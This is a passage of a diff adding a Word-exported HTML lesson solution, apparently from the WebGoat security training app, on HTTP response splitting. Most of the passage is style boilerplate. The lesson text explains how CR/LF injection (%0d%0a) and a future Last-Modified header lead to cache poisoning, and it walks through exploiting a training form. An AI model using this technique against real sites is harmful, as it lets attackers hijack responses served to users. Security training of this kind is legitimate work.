+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:Wingdings;
+	panose-1:5 0 0 0 0 0 0 0 0 0;
+	mso-font-charset:2;
+	mso-generic-font-family:auto;
+	mso-font-pitch:variable;
+	mso-font-signature:0 268435456 0 0 -2147483648 0;}
+@font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+h3
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 3 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:3;
+	font-size:13.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.Heading3Char
+	{mso-style-name:"Heading 3 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 3";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-bidi-font-family:Arial;
+	font-weight:bold;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+ /* List Definitions */
+ @list l0
+	{mso-list-id:74865116;
+	mso-list-type:hybrid;
+	mso-list-template-ids:197531764 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;}
+@list l0:level1
+	{mso-level-tab-stop:36.0pt;
+	mso-level-number-position:left;
+	text-indent:-18.0pt;}
+ol
+	{margin-bottom:0cm;}
+ul
+	{margin-bottom:0cm;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform Http Splitting <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+teaches how to perform HTTP Splitting attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>How the
+attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The attacker
+passes malicious code to the web server together with normal input. A victim
+application will not be checking for CR (carriage return, also given by %0d or
+\r) and LF (line feed, also given by %0a or \n)characters. These characters not
+only give attackers control of the remaining headers and body of the response
+the application intends to send, but also allows them to create additional
+responses entirely under their control.<br>
+The effect of an HTTP Splitting attack is maximized when accompanied with a
+Cache Poisoning. The goal of Cache Poisoning attack is to poison the cache of
+the victim by fooling the cache to believe that the page hijacked using the
+HTTP splitting is a good one and it is indeed the server's copy.<br>
+The attack happens using the HTTP Splitting attack plus adding the <b>Last-Modified:</b>
+header and setting it to a future date. This will force the browser to send <b>If-Modified-Since</b>
+request header, which gives the attacker the chance to intercept the server's
+reply and replace it with a '304 Not Modified' reply. A sample of a 304 response
+is:<br>
+HTTP/1.1 304 Not Modified <br>
+Date: Fri, 30 Dec 2005 17:32:47 GMT <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<!-- Start Instructions -->
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while
+stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.<br>
+Enter a language for the system to search by. You will notice that the
+application is redirecting your request to another resource on the server. You
+should be able to use the CR (%0d) and LF (%0a) to exploit the attack. Your
+exercise should be to force the server to send a 200 OK. If the screen changed
+as an effect to your attack, just go back to the homepage and after stage 2 is
+exploited successfully you will find the green check in the left menu.<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype
+ id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
+ path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_159" o:spid="_x0000_i1038" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="WebGoat/lesson_solutions/HttpSplitting_files/image029.jpg" v:shapes="Picture_x0020_159"><![endif]></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Because the
+input is not validated you can inject any HTTP syntax, carriage returns and
+line-feed you want. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter a
+language to examine what’s going on. You do have WebScarab intercepting HTTP
+requests and responses?<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_160"
+ o:spid="_x0000_i1037" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="WebGoat/lesson_solutions/HttpSplitting_files/image030.jpg" v:shapes="Picture_x0020_160"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Language en</p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_161" o:spid="_x0000_i1036"
+ type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
+src="WebGoat/lesson_solutions/HttpSplitting_files/image031.jpg" v:shapes="Picture_x0020_161"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> HTTP Request</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_162" o:spid="_x0000_i1035"
+ type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
+src="WebGoat/lesson_solutions/HttpSplitting_files/image032.jpg" v:shapes="Picture_x0020_162"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> First HTTP Response</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_163" o:spid="_x0000_i1034"
+ type="#_x0000_t75" style='width:481.5pt;height:344.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="WebGoat/lesson_solutions/HttpSplitting_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=459
